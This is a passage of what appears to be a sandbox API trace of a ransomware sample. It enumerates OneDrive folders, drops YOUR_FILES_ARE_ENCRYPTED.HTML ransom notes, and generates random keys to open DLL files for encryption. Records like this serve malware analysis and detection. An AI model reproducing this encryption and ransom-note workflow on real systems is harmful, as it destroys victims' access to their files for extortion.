pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv") returned 78 [0113.924] GetProcessHeap () returned 0x600000 [0113.924] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.924] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv" [0113.924] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv\\*" [0113.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ccbe0d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x32ccbe0d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x32fecd60, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0113.925] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ccbe0d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x32ccbe0d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x32fecd60, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="..", cAlternateFileName="")) returned 1 [0113.925] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32fecd60, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x32fecd60, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x335bca47, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x150c0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.925] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.925] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.925] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.925] lstrlenW (lpString=".mui") returned 4 [0113.925] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.925] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32fecd60, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x32fecd60, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x335bca47, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x150c0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.925] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0113.925] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.925] GetProcessHeap () returned 0x600000 [0113.925] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.926] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.927] CloseHandle (hObject=0x334) returned 1 [0113.927] GetProcessHeap () returned 0x600000 [0113.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.927] GetProcessHeap () returned 0x600000 [0113.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.927] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x336554be, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x336554be, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x336554be, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sw", cAlternateFileName="")) returned 1 [0113.927] StrStrIW (lpFirst="sw", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.927] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw") returned 78 [0113.927] GetProcessHeap () returned 0x600000 [0113.927] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.927] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw" [0113.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw\\*" [0113.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x336554be, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x336554be, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33a5b30a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.928] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x336554be, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x336554be, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33a5b30a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="..", cAlternateFileName="")) returned 1 [0113.928] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33a5b30a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33a5b30a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x344c97b6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.928] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.928] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.928] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.928] lstrlenW (lpString=".mui") returned 4 [0113.928] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.928] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33a5b30a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33a5b30a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x344c97b6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.929] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.929] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.929] GetProcessHeap () returned 0x600000 [0113.929] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.929] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.931] CloseHandle (hObject=0x334) returned 1 [0113.931] GetProcessHeap () returned 0x600000 [0113.931] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.931] GetProcessHeap () returned 0x600000 [0113.931] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.931] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25924c48, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x25924c48, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2c240c38, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x3018c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="SyncEngine.dll", cAlternateFileName="SYNCEN~1.DLL")) returned 1 [0113.931] StrStrIW (lpFirst="SyncEngine.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.931] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SyncEngine.dll") returned 90 [0113.931] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0113.931] lstrlenW (lpString=".dll") returned 4 [0113.931] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0113.931] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SyncEngine.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\syncengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0113.931] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=3152064) returned 1 [0113.931] GetProcessHeap () returned 0x600000 [0113.931] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.933] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="CB") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="78") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="8A") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="79") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="EF") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="09") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="A6") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C0") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="A2") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="FA") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="E1") returned 2 [0113.933] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="D9") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="9E") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="CF") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="8C") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="6B") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="62") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="62") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="20") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="FA") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="76") returned 2 [0113.934] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="BA") returned 2 [0113.934] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="5E") returned 2 [0113.934] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="12") returned 2 [0113.934] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="66") returned 2 [0113.934] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="FC") returned 2 [0113.934] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="15") returned 2 [0113.934] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="02") returned 2 [0113.934] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="B2") returned 2 [0113.934] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="8A") returned 2 [0113.934] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="61") returned 2 [0113.934] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="6A") returned 2 [0113.935] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SyncEngine.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SyncEngine.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SyncEngine.dll" [0113.935] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.935] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.935] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34df519f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x34df519f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x34df519f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ta", cAlternateFileName="")) returned 1 [0113.935] StrStrIW (lpFirst="ta", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.935] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta") returned 78 [0113.935] GetProcessHeap () returned 0x600000 [0113.935] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.937] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta" [0113.937] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta\\*" [0113.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34df519f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x34df519f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3570c0be, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xc4d9e5, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.938] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34df519f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x34df519f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3570c0be, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xc4d9e5, cFileName="..", cAlternateFileName="")) returned 1 [0113.938] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3570c0be, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3570c0be, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x35c43302, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x178c0, dwReserved0=0x19e010, dwReserved1=0xc4d9e5, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.938] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.938] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.938] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.938] lstrlenW (lpString=".mui") returned 4 [0113.938] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.938] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3570c0be, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3570c0be, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x35c43302, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x178c0, dwReserved0=0x19e010, dwReserved1=0xc4d9e5, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.938] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.938] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.938] GetProcessHeap () returned 0x600000 [0113.938] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ta\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ta\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.939] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.940] CloseHandle (hObject=0x310) returned 1 [0113.940] GetProcessHeap () returned 0x600000 [0113.940] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.940] GetProcessHeap () returned 0x600000 [0113.940] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.940] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35cb5a72, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x35cb5a72, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x35cb5a72, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="te", cAlternateFileName="")) returned 1 [0113.940] StrStrIW (lpFirst="te", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.940] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te") returned 78 [0113.941] GetProcessHeap () returned 0x600000 [0113.941] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.941] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te" [0113.941] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te\\*" [0113.941] FindFirstFileW (in: 